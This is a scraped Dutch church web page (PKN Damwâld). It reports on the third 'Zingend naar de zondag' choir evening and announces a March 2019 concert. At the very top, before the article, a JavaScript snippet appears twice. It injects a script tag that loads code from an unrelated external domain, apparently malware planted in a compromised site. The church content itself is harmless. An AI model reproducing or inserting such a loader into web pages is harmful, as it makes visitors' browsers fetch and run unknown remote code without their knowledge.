;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de zondag in Damwâld-voor de derde keer een enorm succes!! - PKN Damwâld

Zingend naar de zondag in Damwâld-voor de derde keer een enorm succes!!

Gepubliceerd op: vrijdag 2 november 2018

Afgelopen zaterdag vond de 3e editie plaats in de gereformeerde kerk “de Ontmoeting” te Damwâld. De Verenigde Veluwse Koren traden op, dit keer met ongeveer 115 personen. Voor het eerst een gemengd koor onder leiding van Leander van der Steen, een dirigent met heel veel kwaliteiten, passie en een prachtige klik en samenwerking met koor en organist. En dat werd geweldig opgepakt door het massaal opgekomen publiek ( niet eerder was er zoveel) dat ademloos luisterde en uitbundig meedeed met de vele samenzang. Mede daardoor werd het een zangavond om nooit te vergeten. Organist Bert Elbertsen zorgde met zijn kwalitatief hoogstaande inbreng voor nog meer enthousiasme bij de aanwezigen maar ook bij de eigen koorleden. Blijkbaar weet hij ook hen nog steeds te verrassen! Het optreden was kwalitatief van hoog gehalte en toch ook met plezier dat er van afspatte! De presentatie deze avond was in handen van ds. Gaele Postma. Hij deed dat onderhoudend, met de juiste afwisseling serieus, met zelfspot en met de nodige, soms uitdagende, kwinkslagen en die leverden hem zelfs een uitnodiging op uit Veluwse hoek.

Het belangrijkste deze avond was echter de boodschap voor iedereen in deze wereld:

JEZUS is de weg, de ware leidsman! En die evangelische boodschap kwam door de liederen van koor en samenzang geheel tot zijn recht en werd door alle aanwezigen met instemming begroet en van harte omarmd. Kortom, het was een geweldig, saamhorig en WARM bijeen zijn!

Naast de staande ovatie voor het koor waren er bloemen, ook deze keer gesponsord door Jilderda Bloemen, als dank voor de dirigent, organist, spreker en koster. Speciale dank gaat uit naar alle vrijwilligers, voor hun spontane inzet en opnieuw hun bereidwilligheid.

ECHTER er is er maar één die ALLE dank toekomt, onze HEER die dit alles mogelijk maakte en leidde.

Was u deze avond verhinderd te komen? U kunt de volgende alvast noteren: 30 maart 2019 m.m.v. het Christelijk Mannenkoor STEREO uit Genemuiden o.l.v. Harm Hoeve en Jorrit Woudt.

De organisatie

Terugluisteren: